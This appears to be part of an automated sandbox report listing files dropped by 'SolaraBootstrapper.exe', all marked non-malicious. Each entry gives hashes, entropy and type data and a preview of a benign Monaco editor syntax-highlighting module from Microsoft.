                                                  SHA-512:2FE594DE8AC3444223EDC011CBD7F08A6F8AB2DE2BF56919C2D6F1208E22391652D14549C3822C21C4999139FFCE711FDBF00725E95AA01068BF5F223C3B8710
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/ini/ini",["require","exports"],function(e,n){"use strict";Object.defineProperty(n,"__esModule",{value:!0}),n.conf={comments:{lineComment:"#"},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}]},n.language={defaultToken:"",tokenPostfix:".ini",escapes:/\\(?:[abfnrtv\\"']|x[0-9A-Fa-f]{1,4}|u[0-9A-Fa-f]{4}|U[0-9A-Fa-f]{8})/,tokeni
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2944)
                                                  Category:dropped
                                                  Size (bytes):3351
                                                  Entropy (8bit):5.320655556349641
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRsXx+rbV1+/0V1+/mQwZ4Sgbhb6ag71wGcLRWG:hZw+rTx1iSgb8ZiLx
                                                  MD5:826546E08F178D68E8AA2AB29194C03A
                                                  SHA1:444ED723CADC4231F2DCE5C54597FA8558893D12
                                                  SHA-256:44BE702CAE05D5844DC1C452F9BD94020007B9E543A765DB4E6649278607D218
                                                  SHA-512:8EDB46EEFAA3277374BA5DC656423115735573A57E82002745CE6112F666079D6AB7D9B5A79ED208FF51487E9EC2B757C45EC1B3C8119D8CBCD4F7CD30347EF9
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/java/java",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.conf={wordPattern:/(-?\d*\.\d\w*)|([^\`\~\!\#\%\^\&\*\(\)\-\=\+\[\{\]\}\\\|\;\:\'\"\,\.\<\>\/\?\s]+)/g,comments:{lineComment:"//",blockComment:["/*","*/"]},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"},{open:"<",c
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3871)
                                                  Category:dropped
                                                  Size (bytes):4278
                                                  Entropy (8bit):5.272728398324189
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRsR6rMq+q17qcq6V1+/v+ufj1cCzBbu/2nOgeJamEulIHrraW4NUa:hZE6rr9PuhlzBbu4OLaDuKqW4NUa
                                                  MD5:696EF3DCA27B4F9313DEBA6F99710154
                                                  SHA1:D3B377CAE3355C3FACBECC85BB342D4AF34436CA
                                                  SHA-256:ED8D1A9DA4E62D1CFFE4C83580C9DF57D688E850A45ACE72C11BDEB064520A16
                                                  SHA-512:F9F65F8730FAC803CB01D127C467359F428DBCC8E368F40A15FD56B7150B2258E9C581C3A35712CCC2FCDE8A7108C89A33B80CB72721FEA663A11A553657DC29
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/less/less",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.conf={wordPattern:/(#?-?\d*\.\d\w*%?)|([@#!.:]?[\w-?]+%?)|[@#!.]/g,comments:{blockComment:["/*","*/"],lineComment:"//"},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}",notIn:["string","comment"]},{open:"[",close:"]",notIn:["string","comment"]},{open:"(",close:")",notIn:["string","comment"]},{open:'"',close:'"',notIn:["string","comment"]},{open:"'",close:"'",notIn:["string","comment"]}],surroundingPairs:[{open:"{",close:"
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):5498
                                                  Entropy (8bit):4.132811114110444
                                                  Encrypted:false
                                                  SSDEEP:96:SD3yDUfRD5dyVdO29SvE/TMCL8CvcOAtOfxSVkxMZlMfE:nD4Ldyn7Ss/TMmUtOfxhxjE
                                                  MD5:8706D861294E09A1F2F7E63D19E5FCB7
                                                  SHA1:FA5F4BDC6C2F1728F65C41FB5C539211A24B6F23
                                                  SHA-256:FC2D6FB52A524A56CD8AC53BFE4BAD733F246E76DC73CBEC4C61BE32D282AC42
                                                  SHA-512:1F9297EB4392DB612630F824069AFDC9D49259ABA6361FB0B87372123ADA067BC27D10D0623DC1EB7494DA55C82840C5521F6FEF74C1ADA3B0FD801755234F1F
                                                  Malicious:false
                                                  Preview:/*---------------------------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * Licensed under the MIT License. See License.txt in the project root for license information.. *--------------------------------------------------------------------------------------------*/.define(["require", "exports"], function (require, exports) {. 'use strict';. Object.defineProperty(exports, "__esModule", { value: true });. exports.conf = {. comments: {. lineComment: '--',. blockComment: ['--[[', ']]'],. },. brackets: [. ['{', '}'],. ['[', ']'],. ['(', ')'],. ['do', 'end'],. ['then', 'end']. ],. autoClosingPairs: [. { open: '{', close: '}' },. { open: '[', close: ']' },. { open: '(', close: ')' },. { open: '"', close: '"' },. { open: '\'', close: '\
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text, with very long lines (3151)
                                                  Category:dropped
                                                  Size (bytes):3558
                                                  Entropy (8bit):5.402061611997358
                                                  Encrypted:false
                                                  SSDEEP:48:hFDMgRs/x/ezKo0V1+UbM+VAkYz/6EsAkRrDhaoStqSDHzeyiUSgpo+daswRZuQP:hFDMgRsjV1+b+Vv3EsAkRrteD4
                                                  MD5:CAF4799639D5DF40DFB1B979ED68AF9C
                                                  SHA1:6578CCC5111DDC190C354449BE2630D91A21523B
                                                  SHA-256:EAAF453E0A9F9A604547E564A24E682503189CB9B85C87715BC9B5B6492B6F62
                                                  SHA-512:E787F3F849A40C608C3B35B732F16E4400C2D47E89FF309566AFBC879FE37A7018722B959DC8DDC8C859D76E2F7BC0B85555CD27F7FC5E4D8E51E460ED32C9CA
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/markdown/markdown",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var s="keyword",n="string",o="variable.source",c="delimiter.html",a="attribute.name.html",d="string.html";t.conf={comments:{blockComment:["\x3c!--","--\x3e"]},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:"<",close:">",notIn:["string"]}],surroundingPairs:[{open:"(",close:")"},{open:"[",close:"]"},{open:"`",close:"`"}],folding:{markers:{start:new RegExp("^\\s*\x3c!-
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (4889)
                                                  Category:dropped
                                                  Size (bytes):5296
                                                  Entropy (8bit):5.358020639886059
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRsHrviqgq+q17qU/E18Qby0qbmofEsl93Bjy2rzR9sJDJOuz3O+PYLq+v6I:hZmrTY8Ey0UJfEI9z+zz3O+PYLZy4axE
                                                  MD5:EAA7BFF8662633AEC211D57FD17CB8CE
                                                  SHA1:3D783A13339A5797FA701165484BBDB70FFC0616
                                                  SHA-256:6AB13356E083C4334E93D3167BDD17D02552508BFD11EA044C880AF3A1DD94F9
                                                  SHA-512:B3C5069DD3B8B56C0C945CD36909E2D7B575D3B804714B724B7F80BF03DE1983A29E33DCE050FF599017ECE4CE22DCE1F01BDDDA7AE2D41B25779455B96F4C00
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/msdax/msdax",["require","exports"],function(E,T){"use strict";Object.defineProperty(T,"__esModule",{value:!0}),T.conf={comments:{lineComment:"//",blockComment:["/*","*/"]},brackets:[["[","]"],["(",")"],["{","}"]],autoClosingPairs:[{open:'"',close:'"',notIn:["string","comment"]},{open:"'",close:"'",notIn:["string","comment"]},{open:"[",close:"]",notIn:["string","comment"]},{open:"(",close:")",notIn:["string","comment"]},{open:"{",close:"}",notIn:["string","comment"]}]},T.language={defaultToken:"",tokenPostfix:".msdax",ignoreCase:!0,brackets:[{open:"[",close:"]"
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (14475)
                                                  Category:dropped
                                                  Size (bytes):14882
                                                  Entropy (8bit):5.112073612797176
                                                  Encrypted:false
                                                  SSDEEP:384:hALxoDo1S36rNh/xkxnethQZZ62lANnY0k7N6AVzIAtSc2F9/0yW:SLxoDo1e4Nh/xNthQZZgNn67N6AVzIAp
                                                  MD5:6482B3F16CA4F1436D5A5C9B54AB8956
                                                  SHA1:BEC1D967C0DB6CA73CDE65DEBD418F3E2C4DB36C
                                                  SHA-256:7BA586BF9C623DC23F27A46E95A22342CAA1F42D3B19FD9C018EB3B7298206DD
                                                  SHA-512:24B0DCB75254F4D69209D42BED81730C7C9CCAC2230047A8FE46C81DAB5A65618CE59BE1B09100A1A2E42C515EA2A923A9C7084280BC567B2A6EE987CFB11039
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/mysql/mysql",["require","exports"],function(E,T){"use strict";Object.defineProperty(T,"__esModule",{value:!0}),T.conf={comments:{lineComment:"--",blockComment:["/*","*/"]},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}]},T.language={defaultToken:"",tokenPostfix:".sql",ignoreCase:!0,brackets:[{open:"[",close:"]",token:"delim
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2387)
                                                  Category:dropped
                                                  Size (bytes):2794
                                                  Entropy (8bit):5.152653484284549
                                                  Encrypted:false
                                                  SSDEEP:48:hFDMgRs/B2K5rDQ0V1+/n0V1+/XTmT4ZThFk+VAC8DFYbmXCm:hFDMgRslrbV1+/0V1+/jmTElRVACaVF
                                                  MD5:3BA48944CCDA06514BF9723A2308B4C8
                                                  SHA1:E9EBAC91264E0510F8FF80710244C3CE56AEE1B4
                                                  SHA-256:35AF39BAF166F7C2E3C95345B10EC46AA523F98783DAA745AEF64503019E3253
                                                  SHA-512:B8B1096188BF3837A696353988C4BD1B21F1CBDE54A9CE8436F139765189C5DC8FFB02AD931A364D4780FB7FBB7DC18A600CC19A5DB3E1A412F38D7269A24030
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/objective-c/objective-c",["require","exports"],function(e,n){"use strict";Object.defineProperty(n,"__esModule",{value:!0}),n.conf={comments:{lineComment:"//",blockComment:["/*","*/"]},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}]},n.language={defaultToken:"",tokenPostfix:".objective-c",keywords:["#import","#include","#def
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (17607)
                                                  Category:dropped
                                                  Size (bytes):18014
                                                  Entropy (8bit):5.215562324868787
                                                  Encrypted:false
                                                  SSDEEP:384:hhLx5HtCBHHfrxrOmYbatR9uwX6l+qCVFQBTI7e9/asW:PLx5HtCBHHfrxrOmGaZKgKBTIuisW
                                                  MD5:7183810944428C812B3F9F4ED4ADBB6D
                                                  SHA1:5931E0E973678B836F548D11095B77398F7C38E5
                                                  SHA-256:A9487E85B74FD293C0131AE9BC181E72BAECF5A0A6F8B71E97770D79332C09C0
                                                  SHA-512:A0EB6A021B24DB38B98C7DB1C5584BF190F789E5CB65FE13B7FB881FFF1665CDAA7914556E0C0984F620B55B63A7B9F7902B706D596B2603E8720DC85DFA185F
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/pgsql/pgsql",["require","exports"],function(_,e){"use strict";Object.defineProperty(e,"__esModule",{value:!0}),e.conf={comments:{lineComment:"--",blockComment:["/*","*/"]},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}]},e.language={defaultToken:"",tokenPostfix:".sql",ignoreCase:!0,brackets:[{open:"[",close:"]",token:"delim
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text, with very long lines (8006)
                                                  Category:dropped
                                                  Size (bytes):8413
                                                  Entropy (8bit):5.361126073471124
                                                  Encrypted:false
                                                  SSDEEP:192:hZe+rrpRld2BZwd0C4Ov6f+AME/gujcm91wIJ3tjPq:hQ+rr7xPSVrgm91w+3t2
                                                  MD5:FFFC04CACEA00100299900C7969E44DD
                                                  SHA1:D15B7AFF67D8FA813C43E35AC58EC08A74F4701B
                                                  SHA-256:AF43769FA1BDEF70DA786C2296C3A5F91552163C78D5C8EDE46620A146EDDA92
                                                  SHA-512:19DD22739EB9373A2B8F4ACD7712D7631ADF1CFBADBDEC9DAC2BDA25E8594731AB30CAA5CF2DEB241C76429F8E381775B60AE5857E4AC6B735F493885C4DAC6F
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/php/php",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.conf={wordPattern:/(-?\d*\.\d\w*)|([^\`\~\!\@\#\%\^\&\*\(\)\-\=\+\[\{\]\}\\\|\;\:\'\"\,\.\<\>\/\?\s]+)/g,comments:{lineComment:"//",blockComment:["/*","*/"]},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}",notIn:["string"]},{open:"[",close:"]",notIn:["string"]},{open:"(",close:")",notIn:["string"]},{open:'"',close:'"',notIn:["string"]},{open:"'",close:"'",notIn:["string","comment"]}],folding:{markers:{start:new RegExp("^\\
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (7839)
                                                  Category:dropped
                                                  Size (bytes):8246
                                                  Entropy (8bit):5.273054331575847
                                                  Encrypted:false
                                                  SSDEEP:192:hZCrsRJNHUKhfdGiAQ3Sv0vExaeZtSkgsv:hsrsbNHsQ3SMMYcF
                                                  MD5:0C7A2538121071FD75D9F08806500EA3
                                                  SHA1:968D9EE1B928CF62712EC69D5F02AEB025CC3623
                                                  SHA-256:E49FE4654AE374D12DC7A4CB210BA95F490982A014886EDE88A0DAD3FD99A760
                                                  SHA-512:AE39EDD35BD9CAA13C4E263910CE93375BEADEBBEE846EF8D5E5DA1D8F054E236FF3310E2938FCF3F9D1EEFDE1BBE03C20DDAAD243A73F6249D8A1563F6AFE67
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/postiats/postiats",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.conf={comments:{lineComment:"//",blockComment:["(*","*)"]},brackets:[["{","}"],["[","]"],["(",")"],["<",">"]],autoClosingPairs:[{open:'"',close:'"',notIn:["string","comment"]},{open:"{",close:"}",notIn:["string","comment"]},{open:"[",close:"]",notIn:["string","comment"]},{open:"(",close:")",notIn:["string","comment"]}]},t.language={tokenPostfix:".pats",defaultToken:"invalid",keywords:["abstype","abst0ype","absprop","absview","absvtype","absvie
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3256)
                                                  Category:dropped
                                                  Size (bytes):3663
                                                  Entropy (8bit):5.464517498984316
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRsYCGx+lsV1+K6V1+/6cnLsxxeGub2vLycArt6Gr9DB:hZFl+l0yFQQjMJ6Grf
                                                  MD5:25CBB67F273E62A6D0E6DD5C123F5963
                                                  SHA1:81FCAF88C071E6B72648464F1BFDF8FC4FE8CCA6
                                                  SHA-256:D47B6E2970B4BBCD0EB8E4EF69EB2052B117E36AB20C68605A1750AD5991EB51
                                                  SHA-512:94D265EB4E5C91ABF3EDAC2CF17BB37B0402CAE1DBFDF950C12C7B176BAE89EDA618286DA5F51286D2BA684C4FD894DBC138EBDCF2A0B497BBF51BE892A8606E
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/powershell/powershell",["require","exports"],function(e,n){"use strict";Object.defineProperty(n,"__esModule",{value:!0}),n.conf={wordPattern:/(-?\d*\.\d\w*)|([^\`\~\!\@\#%\^\&\*\(\)\=\+\[\{\]\}\\\|\;\:\'\"\,\.\<\>\/\?\s]+)/g,comments:{lineComment:"#",blockComment:["<#","#>"]},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"',notIn:["string"]},{open:"'",close:"'",notIn:["string","comment"]}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"}
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text, with very long lines (4801)
                                                  Category:dropped
                                                  Size (bytes):5208
                                                  Entropy (8bit):5.0930716222982095
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRsnreqgq+q+q15cmFIfnzvN0EJ40LW+LmlgKGJ6V0+piF6ywZ62x3Yxx:hZGrj5xQvKgK2boV0YivwZ6e3Ax
                                                  MD5:4CCE0B17D4F7BF474A5101763EC17C9C
                                                  SHA1:880F10CB67AB667C20D20EE7A53182F5C841DA87
                                                  SHA-256:CDAD9F84576583B68A10519C4F23BA36CD4422CBB7A44FDED2C99A1E823E8043
                                                  SHA-512:9A4B988C88F888355D67F650B8CC3DB8601743037B48497050CEDBD61BF0B1C8864B230279322B4F05FFA8D628FD2979E6FC61E366C7EFE633AFA5439C6F38C7
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/pug/pug",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0}),t.conf={comments:{lineComment:"//"},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:'"',close:'"',notIn:["string","comment"]},{open:"'",close:"'",notIn:["string","comment"]},{open:"{",close:"}",notIn:["string","comment"]},{open:"[",close:"]",notIn:["string","comment"]},{open:"(",close:")",notIn:["string","comment"]}],folding:{offSide:!0}},t.language={defaultToken:"",tokenPostfix:".pug",ignoreCase:!0,brackets:[{token:"delimiter.curly",open
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3001)
                                                  Category:dropped
                                                  Size (bytes):3408
                                                  Entropy (8bit):5.068628361364933
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRsbwV1+K6V1+/gT0g84Ph/F0vcyBBj1dA1TUT27F:hZOYyf0g84PjbS/G1TUTIF
                                                  MD5:D3618CE8D5AEC23FFF67CED39C79EBD9
                                                  SHA1:2C66C7B3D631784CE297AD081FDFFE48E1739EEC
                                                  SHA-256:8B98AEB80E1FD053E80CDFBF79437338D8B1081CCBD999C5373DA225777296AD
                                                  SHA-512:8A6D270AA09FA215FDE2333FEBF0F012C803E83F7EE4091688B91C423408E7B0754D9E1AC3DBC4CB1D8CDE7C06E59A6F140AA38F5C18E43BD2EF544F22B2DCE8
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/python/python",["require","exports"],function(e,n){"use strict";Object.defineProperty(n,"__esModule",{value:!0}),n.conf={comments:{lineComment:"#",blockComment:["'''","'''"]},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"',notIn:["string"]},{open:"'",close:"'",notIn:["string","comment"]}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'},{open:"'",close:"'"}],folding:{offSide:!0,markers:{start:new RegExp("^\\s*#regio
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (2804)
                                                  Category:dropped
                                                  Size (bytes):3211
                                                  Entropy (8bit):5.149479271916287
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRs6RdmV1+IV1+OzjmlMhG6URj1AAEQTUTfBprOE:hZnRdijDj5ne5ZTUT5ll
                                                  MD5:BB2637578BA902DCD3EA172CF8C7B7EA
                                                  SHA1:28C77F1E22FFE267C5AC0960938A9E0BC510FE22
                                                  SHA-256:710905BA785B707484AFED8404C2B092F0B7CA4BF5AA35A7D333A7C07AFEE712
                                                  SHA-512:B14E61CBD53971BBBEE1F237B8C44AAF567C738C54376625ADE5DD121A2364DCE69D39F20D6C4F28BD66348DC0832D2B6540D0ACC85B5054E0B6FD81A8999C25
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/r/r",["require","exports"],function(e,o){"use strict";Object.defineProperty(o,"__esModule",{value:!0}),o.conf={comments:{lineComment:"#"},brackets:[["{","}"],["[","]"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'}],surroundingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",close:")"},{open:'"',close:'"'}]},o.language={defaultToken:"",tokenPostfix:".r",roxygen:["@param","@return","@name","@rdname","@examples","@include","@docType","@S3method","@TODO","@aliases","@alias","@assignee","@
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:exported SGML document, ASCII text, with very long lines (8431)
                                                  Category:dropped
                                                  Size (bytes):8838
                                                  Entropy (8bit):5.286700121966766
                                                  Encrypted:false
                                                  SSDEEP:192:hZnmP+xRERld2BZW40v4Ou6e+vMHjIoQceC8TElNOYJXW:hYP+tsP3zkIoQceCE6JG
                                                  MD5:C87E5B4654C9011E1DF9EEAA10FA4379
                                                  SHA1:25871CADCEBB9EAB44D65EF8483F03C6E4C44723
                                                  SHA-256:2AD872AA67A12A578E652762C21136B9C9E2A741C2752D69EF48C2EB22CC621C
                                                  SHA-512:AAE1EB996D6C157899EA466A184B263DC4380F56615A4C69BC49A49BB30856F55374D8C7DCF159B0D0A8250C24EAA0B8A7B9A40FF2084F20B51BECD3DD5E9535
                                                  Malicious:false
                                                  Preview:/*!-----------------------------------------------------------------------------. * Copyright (c) Microsoft Corporation. All rights reserved.. * monaco-languages version: 1.3.1(1119ababe841a89731059c9bd9522fc59d70f6cb). * Released under the MIT license. * https://github.com/Microsoft/monaco-languages/blob/master/LICENSE.md. *-----------------------------------------------------------------------------*/.define("vs/basic-languages/razor/razor",["require","exports"],function(e,t){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var r="undefined"==typeof monaco?self.monaco:monaco,o=["area","base","br","col","embed","hr","img","input","keygen","link","menuitem","meta","param","source","track","wbr"];t.conf={wordPattern:/(-?\d*\.\d\w*)|([^\`\~\!\@\$\^\&\*\(\)\-\=\+\[\{\]\}\\\|\;\:\'\"\,\.\<\>\/\s]+)/g,comments:{blockComment:["\x3c!--","--\x3e"]},brackets:[["\x3c!--","--\x3e"],["<",">"],["{","}"],["(",")"]],autoClosingPairs:[{open:"{",close:"}"},{open:"[",close:"]"},{open:"(",cl
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text, with very long lines (3533)
                                                  Category:dropped
                                                  Size (bytes):3940
                                                  Entropy (8bit):5.440020798230755
                                                  Encrypted:false
                                                  SSDEEP:96:hFDMgRs62V1+/0V1+/r1c3kdKsTjuMZF/OmfEjac0pPGKP9XSC1U/W:hZnyxqc3kIsuM//OmMD0pP19Cj/W
                                                  MD5:947B18F3F04FE16FC51BEEA925AAB14B
                                                  SHA1:246F89FE753B6C98202E02BCCB7D4CB4D47ED045
                                                  SHA-256:81D912C3BD211AB866500EBC901EEB628B21E5979587901ADECE649BAFF48F30
                                                  SHA-512:54356CFC1B4F280E3B653E8EC073EFB633BEBAA15386F2CDEFDDB232F141C66B55DE062601EF8306146FC7662BCA6A110F9464DA1B27E481DF2FAF66D035BD6D
                                                  Malicious:false
